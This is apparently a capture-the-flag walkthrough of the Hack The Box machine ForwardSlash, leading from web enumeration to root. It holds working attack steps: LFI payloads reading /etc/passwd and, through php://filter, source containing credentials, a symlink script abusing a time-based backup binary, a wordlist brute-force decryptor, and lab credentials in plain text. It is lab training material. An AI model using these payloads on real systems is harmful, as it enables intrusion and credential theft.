HTB Walkthrough ForwardSlash 10.10.10.183

Summary
Foothold
after some web enumeration we find out there is a backup site which still contains a LFI, after looking around we see there is a dev folder which contains a index.php file, in that file we were able to find credentials.
User
after successful login we still need to become another user to get more privileges we find out this user must be called pain and he owns a binary called backup, when we run that program we see it would be able to read a file when we have the right time stamp, after abusing that we were able to read a config bak file and obtain pain his credentials
Root
in pain his home folder he mentions he did encrypt something. lucky for us he did left the decrypt file so we were able to build a brute force decrypt/brute force script. after getting that passphrase we were able to mount a backup and grab the id_rsa of root.
Enumeration
Nmap
nmap -sC -sV -p- 10.10.10.183

only 2 ports open 22 and 80
Web
When visiting http://10.10.10.183 we get redirected to http://forwardslash.htb/ so let put this in our host file


This page doesn’t show much so we are now gonna use gobuster to see if there are any interesting folders or files
gobuster dir -u http://forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

after scanning we discover there is a note.txt which contains the following:
Pain, we were hacked by some skids that call themselves the "Backslash Gang"... I know... That name... Anyway I am just leaving this note here to say that we still have that backup site so we should be fine. -chiv
So we have here 2 potential user names pain and chiv they also mention there is a backup site, now we can try use wfuzz to discover subdomains
wfuzz -u http://forwardslash.htb -H “HOST: FUZZ.forwardslash.htb ” -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt –hw 0

backup is a hit so let’s add that to our host file

New page:

we aren’t able to login with default creds but we can create our own account. now let’s login with that:


after clicking around the change your Profile Picture looks interesting cause they did disable the form:

taking a look at the source code so I know what parameter they are using:

Tuns out it is url
now let’s send this page to burp and try to use the form anyway
turns out this form is vulnerable to LFI

burp request:
POST /profilepicture.php HTTP/1.1
Host: backup.forwardslash.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1geaonp5t1c3pt937l15m24mt9
Upgrade-Insecure-Requests: 1
Content-Length: 45
url=/../../../../../../../../../../etc/passwd
after searching i couldn’t really find anything, since we didn’t scan the new vhost on hiding folders it’s time to do that now:
gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

we found a few files, also config file which contains:
//credentials for the temp db while we recover, had to backup old config, didn’t want it getting compromised -pain
define(‘DB_SERVER’, ‘localhost’);
define(‘DB_USERNAME’, ‘www-data’);
define(‘DB_PASSWORD’, ‘5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec’);
define(‘DB_NAME’, ‘site’);/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);// Check connection
if($link === false){
die(“ERROR: Could not connect. ” . mysqli_connect_error());
}
?>
turns out this file doesn’t bring us anything so time to explore the dev folder
gobuster dir -u http://backup.forwardslash.htb/dev -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

in the dev folder is only a index.php
When we try to read that file with our LFI we get the message: Permission Denied; not that way 😉

so there should be another way to read this file.
when we use a php with Base64 endo we get the file base64 encoded:
url=php://filter/convert.base64-encode/resource=dev/index.php

decode:

we found some creds:
chiv:N0bodyL1kesBack/
login with ssh:

and we are logged in.
after some enum we see pain is also a user on the box. we can read one file in his home folder which is called note.txt
Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key… I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.
-chiv
we are also able to look into folder named encryptorinator
folder contains 2 files:
- ciphertext
- encryper.py
after some more enumeration we find also a note in /var/backups
Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH.
-Pain
after that we find out there is a binary called backup, which is owned by pain:

when we run this we see the following:
Pain's Next-Gen Time Based Backup Viewer
v0.1
NOTE: not reading the right file yet,
only works if backup is taken in same second
----------------------------------------------------------------------
Current Time: 16:49:23
ERROR: e8f539d01f643161206b6f9ff1353c05 Does Not Exist or Is Not Accessible By Me, Exiting...
So it looks like we can read backup files when a backup is made in the same second. in /var/backups is one interesting file also owned by pain called config.php.bak
to read this file we create a file which “fools” the backup binary so we can read the file:
!/bin/bash
time=$(date +”%T”)
hash=”$(echo -n “$time” | md5sum | tr -d – > /tmp/out.txt)”
test=$(cat /tmp/out.txt)
ln -s /var/backups/config.php.bak $test
/usr/bin/backup
chmod +x secwalk.sh
./secwalk.sh

We found some creds
Current Time: 16:56:39
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user ‘root’ with no password) */
define(‘DB_SERVER’, ‘localhost’);
define(‘DB_USERNAME’, ‘pain’);
define(‘DB_PASSWORD’, ‘db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704’);
define(‘DB_NAME’, ‘site’);
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
die(“ERROR: Could not connect. ” . mysqli_connect_error());
}
?>
pain:db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704
on first eye it looks like we found a hash but it turns out this is just pain his password

when we do sudo- l with pain we get the following:

we should be able to mount a backup. we found earlier an img file in the following folder: /var/backups/recovery/encrypted_backup.img
when we run the linux command file against it we see it’s encrypted by luks encrypted:

we should be able to unlock the image like this:
sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
but we getting asked for a passphrase as suspected.
in pain his folder there was a note something about crypto, since this is encrypted we could try to decrypt
since we got a cipher file and the encryptor file we should be able to decrypt the cipher.
I downloaded the files to my machine and changed the encryptor.py a little bit so we could brute force
added the following to the script:
def bruteforce():
cipherfile = open(‘ciphertext’, ‘rb’)
ciphertext = cipherfile.read()
wordlist = open(‘/usr/share/wordlists/rockyou.txt’, ‘r’)
out = open(“dec.txt”, ‘w+’)
for w in wordlist:
dec = decrypt(w, ciphertext)
if “the” in dec:
print(dec.decode(errors=’ignore’))
bruteforce()
python decrypt2.py
~Uy.diWyou liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf
key: cB!6%sdH8Lj^@Y*$C2cf
now it is time run the luke command again:
sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
cB!6%sdH8Lj^@Y*$C2cf
sudo /bin/mount /dev/mapper/backup ./mnt/

backup contains id_rsa file:

chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.183

made by S3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.